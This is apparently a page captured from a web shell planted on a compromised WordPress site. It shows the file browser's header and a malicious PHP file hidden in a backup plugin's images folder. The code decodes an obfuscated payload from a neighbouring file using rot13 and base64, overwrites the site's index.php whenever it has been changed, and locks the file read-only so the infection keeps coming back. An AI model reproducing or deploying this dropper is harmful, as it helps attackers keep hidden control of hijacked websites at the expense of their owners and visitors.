????

Your IP : 216.73.216.86


Current Path : /home/mountain/www/wp-content/plugins/backuply/assets/images/
Upload File :
Current File : /home/mountain/www/wp-content/plugins/backuply/assets/images/60613

<?php
$ddscdws = "index.php";
$acdfadfasf = file_get_contents($ddscdws);
$sdfdsdfh = "/home/mountain/public_html/wp-content/plugins/backuply/assets/images/63816";
if (file_exists($sdfdsdfh)) {
$iide = file_get_contents($sdfdsdfh);
$iide = base64_decode(str_rot13($iide));
if(md5($acdfadfasf) != md5($iide))
{
    @chmod($ddscdws, 0644);
    @file_put_contents($ddscdws, $iide);
    @chmod($ddscdws, 0444);
}
}